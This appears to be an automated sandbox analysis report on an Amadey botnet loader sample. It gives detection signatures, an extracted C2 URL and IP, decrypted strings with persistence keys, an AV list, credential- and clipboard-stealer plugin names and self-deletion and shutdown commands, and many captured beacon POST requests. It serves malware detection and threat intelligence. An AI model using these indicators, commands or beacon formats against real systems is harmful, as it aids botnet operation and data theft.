Windows Analysis Report
jcgLYlM4dg.exe

Overview

General Information

Sample name: jcgLYlM4dg.exe (renamed because the original name is a hash value)
Original sample name: 926fc8b724cc682d97cf0849c0fcbda3.exe
Analysis ID: 1428440
MD5: 926fc8b724cc682d97cf0849c0fcbda3
SHA1: 2f1555afddb43a13be489200a751698302340056
SHA256: bcd9d9e586c6d788717507307e47d2e7c85eeaa49e7766434dbeca97973f8e59
Tags: 32, Amadey, exe, trojan

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected Powershell decode and execute
.NET source code contains a sample name check
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection

Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: C:\Users\user\AppData\Roaming\startup_str_958.vbs Avira: detection malicious, Label: VBS/Runner.VPXO
Source: 14.2.powershell.exe.a081288.4.unpack Malware Configuration Extractor: Amadey {"C2 url": "ruspyc.top/j4Fvskd3/index.php", "Version": "4.18"}
Source: jcgLYlM4dg.exe ReversingLabs: Detection: 26%
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: ruspyc.top
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: /j4Fvskd3/index.php
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: S-%lu-
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: 5027aaabaf
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: Dctooux.exe
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: Startup
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: cmd /C RMDIR /s/q
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: rundll32
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: Programs
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: %USERPROFILE%
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: cred.dll|clip.dll|
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: http://
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: https://
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: /Plugins/
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: &unit=
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: shell32.dll
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: kernel32.dll
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: GetNativeSystemInfo
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: ProgramData\
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: AVAST Software
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: Kaspersky Lab
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: Panda Security
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: Doctor Web
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: 360TotalSecurity
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: Bitdefender
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: Norton
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: Sophos
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: Comodo
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: WinDefender
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: 0123456789
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: ------
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: ?scr=1
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: ComputerName
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: -unicode-
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: VideoID
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: DefaultSettings.XResolution
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: DefaultSettings.YResolution
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: ProductName
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: CurrentBuild
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: rundll32.exe
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: "taskkill /f /im "
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: " && timeout 1 && del
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: && Exit"
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: " && ren
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: Powershell.exe
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: -executionpolicy remotesigned -File "
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: shutdown -s -t 0
Source: 14.2.powershell.exe.a081288.4.unpack String decryptor: random
Source: jcgLYlM4dg.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: jcgLYlM4dg.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: jcgLYlM4dg.exe
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A2BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00A2BA94
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A3D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_00A3D420
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A4C508 FindFirstFileExA, 0_2_00A4C508

Software Vulnerabilities

Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.5:49705 -> 85.114.96.4:80
Source: Malware configuration extractor URLs: ruspyc.top/j4Fvskd3/index.php
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
